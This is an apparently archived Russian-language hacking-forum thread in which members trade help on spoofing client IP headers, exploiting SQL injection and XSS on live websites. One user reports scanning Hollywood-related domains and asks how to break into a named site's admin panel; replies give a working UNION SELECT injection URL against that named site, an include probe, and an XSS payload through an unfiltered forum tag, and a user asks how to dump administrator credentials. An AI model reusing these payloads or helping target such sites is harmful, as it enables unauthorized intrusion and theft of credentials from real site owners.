Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    x_forwarded_for
    remote_ip

    jelatel'no posmotret' skript kotoryi proveryaet ip, tak slojno skazat'
     
    1 person likes this.
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Да врядли там на эти переменные смотрят
    x_forwarded_for
    remote_ip


    не лохи же они.


    смотрят только remote_addr обычно...А его подделать трудно.
     
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    не лохи же они.

    Многие так думают, и слава босху:)

    Без скрипта выводы делать нельзя, "может быть, наверное" - вот это лоховство. Надо точно знать
     
  4. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    попугай Его подделать не возможно =)
     
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 Doom123:

    Ну я бы так не сказал. Вот как ты на php, например, определишь, что чел сидит через прокси? Просто взяв $_SERVER['REMOTE_ADDR']? Не всё так сложно, как кажется:)

    А если анонимная прокси? А если элитная прокси? А если вообще связка носков по всему миру?
     
  6. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    А если цепочка шеллов? :)
     
  7. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Ты сам понял что сказал? Ты имеешь в виду цепочку прокси? (Или с каждого шелла стучаться на другой сайт - в чём отличие?)
     
    1 person likes this.
  8. navigat0r

    navigat0r Member

    Joined:
    15 Mar 2009
    Messages:
    83
    Likes Received:
    54
    Reputations:
    -2
    при http://www.site.ru/news/?i=4343'
    вот это
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''4343'' ORDER BY `news_date` DESC,`id` DESC' at line 10
    изменить запрос можно, проверил
    может криво проверил, просто дальше не получается
    помогите кто нить, за сайтом в личку
     
  9. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    Pashkela я к тому что он сказал "А его подделать трудно."
    переопределить значение этой переменной не возможно ... например ты не можешь сделать так чтоб там было 0.0.0.0 =)

    navigat0r читай статьи по скуль иньекции =)
     
  10. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    navigat0r, похоже на скулю в ордере. Смотри линк в прикрепленной статье jokester`a.
     
  11. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    $n@ke, скуля до ORDER BY, смотри запрос:

    to use near ''4343'' ORDER BY `news_date` DESC,`id` DESC' at line 10

    Число 4343, до ORDER BY, а не после.
     
    1 person likes this.
  12. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    решил просканировать скуль сканером домены связанные с Голливудом)) (Сам я новичек в поиске уязвимостей, кроме азов). Ну так вот, сканер выдал вот это: http://hollywoodrivierarealestate.com/ (MSSQL Injection)

    1.Я не понимаю что и как дальше искать.....Что посоветуете?
    2. Нашел админку по адресу http://www.hollywoodwiretap.com/admin/login.php . Что посоветуете делать с ней, чтобы попасть внутрь))
     
  13. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    Сканер должен был сказать в каком скрипте инъект!
    Вот его и крути...по MSSQL Injection читать тут:
    http://forum.antichat.ru/thread30501.html
    2. ввести пароль)

    Что я нашол беглым осмотром:
    инклуд
    Code:
    http://www.hollywoodwiretap.com/?module='
    На сервере включен magic_quotes так как даные слешируются...
     
  14. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    bug1z, а какой сканер посоветуешь?
     
  15. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    NMAP или XSPIDER
    Но помни, что пока лутший известный сканер - это человеческий мозг. Собери под него базу! (c)Elekt
     
    #7055 bug1z, 14 May 2009
    Last edited: 14 May 2009
  16. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Скуля тоже есть вывод в тайтле

    http://www.hollywoodwiretap.com/?module=news&action=page&category=-1+union+select+1,2,table_name,4,5,6+from+information_schema.tables

    jecka3000, если ты новичок - самое глупое что можно сделать - юзать тупые сканеры. Читай статьи и учись искать уязвимости сам
     
    1 person likes this.
  17. Flair

    Flair Member

    Joined:
    7 May 2009
    Messages:
    36
    Likes Received:
    13
    Reputations:
    9
    Слушыл, что если вфоруме есть тег
    PHP:
    то его как то можно использоватьПравдо ли тоЕсли дато как его юзать
     
  18. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    2Flair
    Данный баг пашет не везде!
    Давай разберёмся как он работает:
    PHP:
    $row['text'] = str_replace('[php]','<table style="border: 1px solid #06499d; padding: 0px;" width="100%"><tr><td align="left" style="padding: 10px 12px"><left><b><u><font color="#06499d">Êîä:</font></u></b></left><br><font color="#06499d">'$row['text']);
    $row['text'] = str_replace('[/p*hp]','</td></tr></table><br></font>'$row['text']);
    То есть

    [p*hp] заменяется на


    PHP:
    <table style="border: 1px solid #06499d; padding: 0px;" width="100%"><tr><td align="left" style="padding: 10px 12px"><left><b><u><font color="#06499d">Êîä:</font></u></b></left><br><font color="#06499d">
    а

    [/php]

    на закрытие тегов:

    PHP:
    </td></tr></table><br></font>
    То есть если нет фильтрации, то мы можем вставить свой код!

    Пример:

    [p*hp]<script>alert('lol')</script>[/p*hp]

    В коде это будет выглядеть так:

    PHP:
    <table style="border: 1px solid #06499d; padding: 0px;" width="100%"><tr><td align="left" style="padding: 10px 12px"><left><b><u><font color="#06499d">Eia:</font></u></b></left><br><font color="#06499d"><script>alert('lol')</script></td></tr></table><br></font>
     
    #7058 bug1z, 14 May 2009
    Last edited: 14 May 2009
    1 person likes this.
  19. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    Еще один вопрос. Нашел на сайте скулю. Какими командами заставить вывести лоигн и пароль администратора (пускай даже в виде хэша)?
     
  20. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    jecka3000 читай мануалы =\
    Тут специалисты не собираються переписывать мануалы
     
Thread Status:
Not open for further replies.